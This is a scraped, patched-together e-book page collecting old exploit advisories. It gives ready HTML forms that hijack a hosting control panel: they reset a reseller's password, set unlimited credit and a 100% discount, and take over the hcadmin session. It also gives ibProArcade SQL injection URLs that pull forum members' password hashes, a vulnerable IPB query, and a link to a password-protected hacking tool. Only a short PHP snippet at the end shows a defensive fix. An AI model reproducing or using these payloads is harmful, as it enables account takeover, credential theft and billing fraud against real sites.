
Hacker Professional Ebook part 378 ppt


DOCUMENT INFORMATION

Basic information

Title Hacker Professional Ebook Part 378 Ppt
Author Soroush Dalili
Supervisor Farhad Saaedi
School Kahkeshan Co.
Field IT Security
Category Ebook
Year of publication 2006
City Tehran
Format
Pages 5
Size 64,23 KB


Content


<td>txtcardno</td>

<td><input type="text" name="txtcardno" value=""></td>

</tr>

</table>

<br><input type="submit">

</form>

-

===============================================

2- This code lists all of the resellers; then you must change the password of one of them, then log in with it for the next step

Note: Also with this code, anyone can increase their Credit value and then buy every host

-

<form action="http://[url]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">

<table>

<tr>

<td>Username:</td>

<td><input type="text" name="UserName" value="hcadmin"></td>

</tr>

<tr>

<td>Description:</td>

<td><input type="text" name="Description" value=""></td>

</tr>

<tr>

<td>FullName:</td>

<td><input type="text" name="FullName" value=""></td>

</tr>

<tr>

<td>AccountDisabled 1,[blank]:</td>

<td><input type="text" name="AccountDisabled" value=""></td>

</tr>

<tr>

<td>UserChangePassword:</td>


<td><input type="text" name="UserChangePassword" value=""></td>

</tr>

<tr>

<td>PassCheck=TRUE,0:</td>

<td><input type="text" name="PassCheck" value="0"></td>

</tr>

<tr>

<td>New Password:</td>

<td><input type="text" name="Pass1" value=""></td>

</tr>

<tr>

<td>DefaultDiscount%:</td>

<td><input type="text" name="DefaultDiscount" value="100"></td>

</tr>

<tr>

<td>CreditLimit:</td>

<td><input type="text" name="CreditLimit" value="99999"></td>

</tr>

</table>

<br><input type="submit">

</form>

<hr><br>

-

===============================================

3- Now you must log in as the reseller whose password was changed in the last step. Now go to the userlist; if there is a user, that will be enough, and if no user is available, you must make one!

Now select it and click Enter to enter as that user. Now the bug will be available: each reseller can gain every user session, even "HCADMIN", through a bug in "Check_Password.asp"

The code below will help you:

-

<hr><br>

Form1<br>

<form action="http://[url]/Admin/Check_Password.asp" method="post">


<table>

<tr>

<td>AdName</td>

<td><input type="text" name="AdName" value="hcadmin"></td>

</tr>

</table>

<br><input type="submit">

</form>

<hr><br>

-

===============================================

-

Finder: Soroush Dalili (http://www.google.com/search?hl=en&q="soroush+dalili")

Email: Irsdl[47]Yahoo[d07]com

Team: GSG (Grayhatz Security Group) [Grayhatz.net]

Thanks from:

Farhad Saaedi (farhadjokers[4t]yahoo[d0t]com)

Small.Mouse from Shabgard.org (small.mouse[4t]yahoo[d0t]com)

Kahkeshan Co (IT Department) (www.kahkeshan.com)

Related URLs:

http://hidesys.persiangig.com/other/HC_BUGS_BEFORE3.2.txt (all hc bugs by Irsdl)

http://hidesys.persiangig.com/other/HC%20Hack%20Prog.rar [password: grayhatz.net] (HC automation hacking program source code by simple VB)

# milw0rm.com [2006-07-06]

vns3curity(HCE)


IBP Exploits 1.3.1

Quote:

Advisory number VI


http://pro-hack.ru

Product: IBP <= 1.3.1

programming language: php

Features: the exploit shows an interesting method of guessing the password using LIKE (very simple)

Security searching: Advice

Bug level: Moderate

A moderator can raise their privileges on the forum

Insufficient data filtering

if ($ibforums->input['move_id'] == "" or $ibforums->input['move_id'] == -1)
{
    $std->Error( array( 'LEVEL' => 1, 'MSG' => 'move_no_forum' ) );
}

// -

if ($ibforums->input['move_id'] == $ibforums->input['sf'])
{
    $std->Error( array( 'LEVEL' => 1, 'MSG' => 'move_same_forum' ) );
}

// -

$DB->query("SELECT id, subwrap, sub_can_post, name, redirect_on FROM ibf_forums WHERE id IN(".$ibforums->input['sf'].",".$ibforums->input['move_id'].")");

http://pro-hack.org/exploits/our/ipb1.3_m_t_a.txt

Translate it yourselves; taken from Pro-hack.ru

Does anyone have any comments?

QX147(HCE)

ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit

IPB:

index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]

vBulletin forums:

index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]

Posted: 04/07/2014, 12:20
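
Added example (not from the advisories, IPB or ibProArcade): the forum-move lookup quoted above concatenates `sf` and `move_id` straight into the `IN(...)` list, and the ibProArcade URLs show a `user` value reaching a query the same way. One way to close this class of bug is to accept only positive integers and bind them as parameters; the function names `id_or_null` and `build_move_lookup` are hypothetical.

```php
<?php
// Added example, not IPB or ibProArcade source; function names are hypothetical.

// Return $raw as a positive integer id, or null when it is anything else.
// Only ASCII digits pass, so "", "-1" and "3,9" are all refused.
function id_or_null($raw): ?int
{
    if (!is_string($raw) && !is_int($raw)) {
        return null;                      // arrays, null, floats, objects
    }
    $s = (string) $raw;
    if ($s === '' || strlen($s) > 9 || !ctype_digit($s)) {
        return null;                      // non-digits, or too long for a 32-bit int
    }
    $id = (int) $s;
    return $id > 0 ? $id : null;
}

// Build the forum-move lookup with bound parameters instead of concatenation.
// Returns [sql, params], or null when an id is invalid or both ids are equal.
function build_move_lookup(array $input): ?array
{
    $sf   = id_or_null($input['sf'] ?? null);
    $move = id_or_null($input['move_id'] ?? null);
    if ($sf === null || $move === null || $sf === $move) {
        return null;
    }
    $sql = 'SELECT id, subwrap, sub_can_post, name, redirect_on '
         . 'FROM ibf_forums WHERE id IN (?, ?)';
    return [$sql, [$sf, $move]];
}

// Constructed sample inputs (not taken from any real request log).
$samples = [
    ['sf' => '3',   'move_id' => '7'],   // two distinct positive ids
    ['sf' => '3',   'move_id' => '-1'],  // negative id
    ['sf' => '3,9', 'move_id' => '7'],   // extra list element inside sf
    ['sf' => '3',   'move_id' => '3'],   // same forum twice
    ['sf' => ['3'], 'move_id' => '7'],   // array instead of a scalar
];
foreach ($samples as $in) {
    $q = build_move_lookup($in);
    echo json_encode($in), ' => ', $q === null ? 'rejected' : json_encode($q), PHP_EOL;
}
```

The returned pair is meant for a prepared-statement API such as PDO (`prepare`, then `execute` with the parameter array).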
